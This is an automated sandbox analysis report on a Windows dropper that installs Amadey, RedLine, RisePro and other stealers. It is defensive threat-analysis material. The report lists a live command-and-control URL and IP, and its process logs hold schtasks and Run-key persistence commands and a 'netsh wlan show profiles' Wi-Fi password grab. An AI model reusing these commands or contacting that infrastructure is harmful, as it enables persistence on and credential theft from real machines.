Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1430545
MD5: 169d873778a229bcb4f010f87930cb28
SHA1: 15d928181a3abe9fc84d21454246676baad444a8
SHA256: f2f647ba7ca2104c8d5aa7130502eb7a48ce1ae629ee33abf1efcc07f172c449
Tags: exe

Detection

Amadey, PureLog Stealer, RedLine, RisePro Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
System process connects to network (likely due to code injection or exploit)
Yara detected Amadeys Clipper DLL
Yara detected Amadeys stealer DLL
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected RisePro Stealer
Yara detected zgRAT
.NET source code contains very large array initializations
Allocates memory in foreign processes
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Found API chain indicative of debugger detection
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 3200 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 169D873778A229BCB4F010F87930CB28)
    • explorta.exe (PID: 3092 cmdline: "C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe" MD5: 169D873778A229BCB4F010F87930CB28)
      • b3168c3d9b.exe (PID: 6556 cmdline: "C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe" MD5: 81A8F98229FF9CD694A2CB7389D22EF8)
        • chrome.exe (PID: 1096 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 1276 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 3116 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5612 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 7520 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5584 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 8708 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 10936 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • 2531414c80.exe (PID: 7556 cmdline: "C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe" MD5: A5E341D76C1BE40293C678679CA9A729)
        • schtasks.exe (PID: 8036 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
          • conhost.exe (PID: 8064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 8160 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
          • conhost.exe (PID: 8176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WerFault.exe (PID: 9292 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7556 -s 2036 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • Conhost.exe (PID: 11964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • explorta.exe (PID: 8804 cmdline: "C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe" MD5: 169D873778A229BCB4F010F87930CB28)
      • amert.exe (PID: 8380 cmdline: "C:\Users\user\AppData\Local\Temp\1000012001\amert.exe" MD5: 3AB592D71455D47170AB784430AE8102)
  • explorta.exe (PID: 1088 cmdline: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe MD5: 169D873778A229BCB4F010F87930CB28)
  • svchost.exe (PID: 2892 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • b3168c3d9b.exe (PID: 8184 cmdline: "C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe" MD5: 81A8F98229FF9CD694A2CB7389D22EF8)
    • chrome.exe (PID: 7256 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 6020 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2008,i,1160871462993257416,2185165771260797926,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • MPGPH131.exe (PID: 6188 cmdline: C:\ProgramData\MPGPH131\MPGPH131.exe MD5: A5E341D76C1BE40293C678679CA9A729)
    • WerFault.exe (PID: 11960 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 79380 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • MPGPH131.exe (PID: 2584 cmdline: C:\ProgramData\MPGPH131\MPGPH131.exe MD5: A5E341D76C1BE40293C678679CA9A729)
    • WerFault.exe (PID: 11944 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 2040 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • 2531414c80.exe (PID: 8848 cmdline: "C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe" MD5: A5E341D76C1BE40293C678679CA9A729)
  • svchost.exe (PID: 7856 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 8384 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 7556 -ip 7556 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 11880 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6188 -ip 6188 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 11920 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2584 -ip 2584 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 8128 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 12156 -ip 12156 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 11600 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • RageMP131.exe (PID: 11696 cmdline: "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe" MD5: A5E341D76C1BE40293C678679CA9A729)
  • svchost.exe (PID: 12036 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • chrosha.exe (PID: 12108 cmdline: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe MD5: 3AB592D71455D47170AB784430AE8102)
  • b3168c3d9b.exe (PID: 12228 cmdline: "C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe" MD5: 81A8F98229FF9CD694A2CB7389D22EF8)
    • chrome.exe (PID: 9452 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 6848 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1960,i,5587240117108389418,17388237419523249848,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • 2531414c80.exe (PID: 984 cmdline: "C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe" MD5: A5E341D76C1BE40293C678679CA9A729)
  • RageMP131.exe (PID: 11804 cmdline: "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe" MD5: A5E341D76C1BE40293C678679CA9A729)
  • chrosha.exe (PID: 8660 cmdline: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe MD5: 3AB592D71455D47170AB784430AE8102)
    • swiiiii.exe (PID: 12156 cmdline: "C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe" MD5: 1C7D0F34BB1D85B5D2C01367CC8F62EF)
      • conhost.exe (PID: 12172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegAsm.exe (PID: 8412 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • WerFault.exe (PID: 5808 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 12156 -s 844 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 12164 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 12188 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main MD5: EF3179D498793BF4234F708D3BE28633)
        • netsh.exe (PID: 8180 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • explorta.exe (PID: 8168 cmdline: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe MD5: 169D873778A229BCB4F010F87930CB28)
Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name: zgRAT
Description: zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an infostealer use which targets browser information and cryptowallets. Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
{"C2 url": ["http://193.233.132.139/sev56rkm/index.php"]}
Yara matches, dropped files:
Source | Rule | Description | Author
C:\Users\user\AppData\Local\Temp\cgrqKzIZDKj22M18G57j8co.zip | JoeSecurity_RiseProStealer | Yara detected RisePro Stealer | Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\clip64[1].dll | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\clip64[1].dll | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\NewB[1].exe | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
C:\Users\user\AppData\Local\Temp\1000150001\NewB.exe | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
(13 further entries not shown)

Yara matches, memory dumps:
Source | Rule | Description | Author
00000008.00000002.2516925001.0000000007BDD000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_RiseProStealer | Yara detected RisePro Stealer | Joe Security
0000002C.00000003.2631909972.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
00000000.00000003.1986544625.0000000005350000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
0000002D.00000002.2674415512.0000000000591000.00000040.00000001.01000000.00000007.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
00000003.00000003.2026683858.0000000005140000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
(26 further entries not shown)

Yara matches, unpacked PE files:
Source | Rule | Description | Author
37.2.chrosha.exe.a00000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
44.2.chrosha.exe.a00000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
2.2.explorta.exe.590000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
26.2.amert.exe.860000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
3.2.explorta.exe.590000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
(2 further entries not shown)

System Summary

Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe, ProcessId: 3092, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b3168c3d9b.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe, ProcessId: 3092, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b3168c3d9b.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Windows\System32\svchost.exe, ProcessId: 2892, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT1C07.tmp
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST, CommandLine: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe, ParentProcessId: 7556, ParentProcessName: 2531414c80.exe, ProcessCommandLine: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST, ProcessId: 8036, ProcessName: schtasks.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2892, ProcessName: svchost.exe

Stealing of Sensitive Information

Source: Process started | Author: Joe Security | Data: Command: netsh wlan show profiles, CommandLine: netsh wlan show profiles, CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 12188, ParentProcessName: rundll32.exe, ProcessCommandLine: netsh wlan show profiles, ProcessId: 8180, ProcessName: netsh.exe

No Snort rule has matched

AV Detection

Source: file.exe | Avira: detected
Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Avira: detection malicious, Label: HEUR/AGEN.1360556
Source: explorta.exe.3092.2.memstrmin | Malware Configuration Extractor: Amadey {"C2 url": ["http://193.233.132.139/sev56rkm/index.php"]}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\NewB[1].exe | ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\amert[1].exe | ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sarra[1].exe | ReversingLabs: Detection: 51%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\swiiii[1].exe | ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\gold[1].exe | ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\jok[1].exe | ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\cred64[1].dll | ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\file300un[1].exe | ReversingLabs: Detection: 30%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\swiiiii[1].exe | ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\alexxxxxxxx[1].exe | ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\clip64[1].dll | ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\install[1].exe | ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe | ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe | ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\1000148001\alexxxxxxxx.exe | ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\1000149001\gold.exe | ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Temp\1000150001\NewB.exe | ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\1000152001\jok.exe | ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\1000153001\swiiii.exe | ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\1000181001\file300un.exe | ReversingLabs: Detection: 30%
Source: C:\Users\user\AppData\Local\Temp\1000208001\install.exe | ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll | ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll | ReversingLabs: Detection: 91%
Source: file.exe | ReversingLabs: Detection: 47%
Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Joe Sandbox ML: detected
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_00833EB0 CryptUnprotectData,CryptUnprotectData,8_2_00833EB0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_0010C2A2 FindFirstFileExW,4_2_0010C2A2
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_001468EE FindFirstFileW,FindClose,4_2_001468EE
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_0014698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,4_2_0014698F
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_0013D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,4_2_0013D076
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_0013D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,4_2_0013D3A9
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_00149642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_00149642
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_0014979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_0014979D
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_00149B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,4_2_00149B2B
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_0013DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,4_2_0013DBBE
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Code function: 4_2_00145C97 FindFirstFileW,FindNextFileW,FindClose,4_2_00145C97
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_008333B0 FindFirstFileA,FindNextFileA,8_2_008333B0
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_00853B20 FindFirstFileA,FindNextFileA,SetFileAttributesA,RemoveDirectoryA,std::_Throw_Cpp_error,std::_Throw_Cpp_error,8_2_00853B20
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Code function: 8_2_007A1F8C FindFirstFileExW,8_2_007A1F8C
Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe | File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe | File opened: C:\Users\user\Desktop\desktop.ini

Networking

Source: C:\Windows\System32\rundll32.exe | Network Connect: 193.233.132.167 80
Source: Malware configuration extractor | IPs: 193.233.132.139
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT1659.tmp, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Code function: 2_2_0059B670 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,2_2_0059B670
